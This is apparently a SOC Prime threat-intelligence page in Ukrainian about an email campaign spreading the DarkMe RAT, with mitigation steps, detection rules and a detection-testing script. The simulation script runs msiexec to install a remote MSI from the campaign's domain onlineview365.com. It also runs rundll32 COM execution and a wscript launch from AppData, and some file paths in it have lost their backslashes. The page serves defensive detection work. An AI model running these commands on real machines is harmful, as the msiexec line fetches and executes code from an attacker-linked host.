SOC Prime Bias: High

25 Sep 2026 08:20 UTC

Кампанія розсилки електронних листів DarkMe розширює цілеспрямованість в атаках APT RAT

Author Photo
SOC Prime Team linkedin icon Стежити
Кампанія розсилки електронних листів DarkMe розширює цілеспрямованість в атаках APT RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Відзначено нову кампанію, що доставляє шпигунське RAT ПЗ DarkMe, яка покладається на соціальну інженерію замість експлойтів програмного забезпечення. Зловмисники поширюють .pif файл через електронну пошту, який запускає багатоступеневий ланцюжок інфекції, що включає MSIEXEC та декілька завантажувачів на базі VB6. Відмова від експлуатації нульових днів на користь соціальної інженерії вказує на перехід до дешевших, ширших та менш вибіркових методів атаки.

Розслідування

Huntress виявила кампанію після виявлення .pif файлу, що запускає Windows Installer для отримання віддаленого MSI пакету. Аналіз розкрив складний багатоступеневий ланцюг, що включає сценарій підготовки, названий prnfig.wsf, імпорт реєстру та виконання COM об’єкта через rundll32.exe /sta. Останній етап використовує процес підміни для ін’єкції навантаження DarkMe у підписаний бінарник Microsoft clspack.exe.

Пом’якшення

Захисники повинні контролювати rundll32.exe запуск з прапором /sta та GUID без супровідного шляху до DLL. Служби безпеки також повинні виявляти msiexec отримання віддалених MSI пакетів через HTTPS і розслідувати виконання .pif файлів. Підписані бінарники Microsoft, що працюють з незвичних місць, таких як %AppData% потребують додаткового контролю.

Відповідь

Коли виявлено підозрілу діяльність, негайно ізолюйте уражену кінцеву точку, щоб порушити C2-комунікації та запобігти ексфільтрації даних. Завершіть процес підміни та видаліть шкідливі артефакти з clspack.exe process and remove malicious artifacts from %AppData%ComponentsFolder and %AppData%Microsoft. Видаліть персистентність, створену через призначений URL-протокольний обробник та ключ HKCU Run . Скиньте затронуті облікові дані користувача та розгляньте будь-які локально збережені криптовалютні гаманці як потенційно скомпрометовані.

Потік атаки

Ми продовжуємо оновлювати цю частину.

Виявлення

Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через події реєстру)

Команда SOC Prime
24 вересня 2026 року

Незвичайне розширення виконуваного бінарного файлу (через створення процесу)

Команда SOC Prime
24 вересня 2026 року

LOLBAS WScript / CScript (через створення процесу)

Команда SOC Prime
24 вересня 2026 року

Можлива спроба встановлення віддаленого MSI файлу (через командний рядок)

Команда SOC Prime
24 вересня 2026 року

Підозрілі команди та управління за допомогою незвичайного верхнього рівня домену (TLD) DNS запит (через DNS)

Команда SOC Prime
24 вересня 2026 року

Індикатори компрометації (HashSha256) для виявлення: Кампанія електронної пошти DarkMe розширює націлювання для APT RAT

Правила AI SOC Prime
24 вересня 2026 року

Індикатори компрометації (SourceIP) для виявлення: Кампанія електронної пошти DarkMe розширює націлювання для APT RAT

Правила AI SOC Prime
24 вересня 2026 року

Індикатори компрометації (DestinationIP) для виявлення: Кампанія електронної пошти DarkMe розширює націлювання для APT RAT

Правила AI SOC Prime
24 вересня 2026 року

Виявлення C2-комунікацій та домену підготовки для DarkMe RAT [Windows Network Connection]

Правила AI SOC Prime
24 вересня 2026 року

Виявлення злочинної діяльності у кампанії DarkMe RAT [Windows Process Creation]

Правила AI SOC Prime
24 вересня 2026 року

Виконання симуляції

  • Сценарій атаки та команди: Зловмисник прагне розгорнути DarkMe RAT для збереження стійкості. Щоб уникнути виявлення на основі підписів, зловмисник використовує msiexec для завантаження віддаленого навантаження з компрометованого домену (onlineview365.com). Після початкової інфекції зловмисник використовує rundll32.exe для виклику певного COM об’єкта через GUID для виконання коду в пам’яті, а згодом використовує cmd.exe для імпорту конфігурацій реєстру з текстового файлу для підготовки середовища для виконання wscript.exe на базі сценарію навантаження.

  • Скрипт регресійного тестування:

    # Симуляційний скрипт DarkMe RAT
    # Цей скрипт імітує точні командні рядки, визначені в правилі Sigma.
    
    Write-Host "[+] Початок симуляції DarkMe RAT..." -ForegroundColor Cyan
    
    # 1. Імітація віддаленого завантаження msiexec
    Write-Host "[*] Імітація віддаленого завантаження msiexec..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. Імітація виконання COM об'єкта rundll32
    Write-Host "[*] Імітація виконання COM об'єкта rundll32..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. Імітація імпорту реєстру cmd.exe
    Write-Host "[*] Імітація імпорту реєстру cmd.exe..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. Імітація виконання wscript.exe через ланцюжок батьків/дочірніх процесів cmd/rundll32
    Write-Host "[*] Імітація виконання wscript.exe з AppData..."
    $scriptPath = "$env:APPDATAmalicious_script.vbs"
    "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # Щоб активувати конкретне правило батько/дитина:
    # Батько: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # Дитина: wscript.exe %AppData%malicious_script.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] Симуляція завершена." -ForegroundColor Green
  • Команди очищення:

    # Очищення артефактів симуляції
    Write-Host "[+] Очищення..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] Очищення завершено." -ForegroundColor Green